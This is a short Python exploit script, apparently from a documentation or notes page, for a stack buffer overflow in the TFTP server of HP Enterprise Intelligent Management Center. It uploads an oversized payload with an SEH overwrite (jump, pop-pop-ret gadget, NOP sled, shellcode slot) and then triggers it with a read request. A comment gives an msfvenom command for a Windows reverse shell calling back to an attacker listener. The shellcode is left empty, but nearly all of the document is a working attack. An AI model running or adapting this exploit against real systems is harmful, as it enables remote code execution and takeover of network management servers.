Intelligent Management Center (iMC)
Application Portfolio by HP Enterprise. Exploit by DS.
TFTP Server Stack Buffer Overflow RCE (safeSEH)
import socket
import sys
import math
from struct import pack
pktNum = 0x30
blksize = b"1024"
filename = bytearray(b"test.txt")
#[*] Exact match at offset 5952
#[*] Exact match at offset 26232
#[*] Exact match at offset 46512
#payload = bytearray([0x41]*(26000))
#payload += b"BBBB"
#payload += bytearray([0x41]*(50000-len(payload)))
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.55 LPORT=4444 -b "\x00" -f python -v shellcode
shellcode = b""
pad = bytearray([0x90]*0x488)
payload = bytearray([0x41]*(26236))
payload += pack("<L", 0x06eb9090) #NSEH jmp 0x06
payload += pack("<L", 0x120cd607) #SEH pop pop ret gadget
payload += pad
payload += shellcode
payload += bytearray([0x41]*(200000-len(payload)))
payLen = int(math.ceil(len(payload) / 0x512)) + 1
def buildWRQ():
#packet 1 WRQ
opcode = 0x02
buf = bytearray((0x00, opcode))
#filename
for b in filename:
buf.append(b)
buf.append(0x00)
'''
opcode operation
1 Read request (RRQ)
2 Write request (WRQ)
3 Data (DATA)
4 Acknowledgment (ACK)
5 Error (ERROR)
'''
buf += b"OCTET"
buf.append(0x00)
buf += b"14280"
return buf
def sendWRQ(server,port,buf,payload):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(buf, (server,port))
print('Connecting...')
resp = s.recvfrom(320)
print('Sending payload...')
new_port = resp[1][1]
for i in range(0, payLen):
b = payload[(i*0x512):((i*0x512)+0x512)]
buf2 = makeDp(i, b)
s.sendto(buf2, (server,new_port))
buf2 = ""
resp = s.recvfrom(320)
finalb = bytearray()
finalbuf = makeDp(i+1, finalb)
s.sendto(finalbuf, (server, new_port))
s.close()
print("[+] WRQ Packets sent")
#packet 2 DATA
def makeDp(pktNum, buf):
buf2 = pack(">H",0x0003)
buf2 += pack(">H", pktNum)
buf2 += buf
return buf2
def buildRRQ(blkSize):
#SO during opcode 0x02 - 0x40af2c
#call to 0x407730 at 0x40a84e calls fread
opcode = 0x01
buf = bytearray((0x00, opcode))
for b in filename:
buf.append(b)
buf.append(0x00)
buf += b"OCTET"
buf.append(0x00)
# buf += b"tsize"
# buf.append(0x00)
# buf += b"-1"
# buf.append(0x00)
if blkSize:
buf += b"blksize"
buf.append(0x00)
buf += blkSize #overwrites stack cookie over 10000 and SEH over 10004 # seems limited to 61439 anything larger and fread returns file not found...
buf.append(0x00)
return buf
def sendRRQ(server,port):
buf = buildRRQ(b"61439")
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(buf, (server,port))
# resp = s.recvfrom(3)
print('Do we have a shell?')
# new_port = resp[1][1]
# blkNum = 0
# ack = buildACK(blkNum)
# s.sendto(ack,(server,new_port))
# resp = s.recvfrom(3)
#buf = buildRRQ(b"61000")
#s.sendto(buf,(server,new_port))
#resp = s.recvfrom(3200)
# while resp:
# blkNum = resp[0][3]
# print(resp)
# ack = buildACK(blkNum)
# s.sendto(ack,(server,new_port))
# resp = s.recvfrom(3)
def buildACK(blkNum):
buf2 = bytearray("\x00\x04\x00")
buf2.append(blkNum)
return buf2
def main():
server = sys.argv[1]
port = 69
buf = buildWRQ()
sendWRQ(server,port,buf,payload)
print('Requesting payload read...')
sendRRQ(server,port)
if __name__ == "__main__":
main()
Last updated
Was this helpful?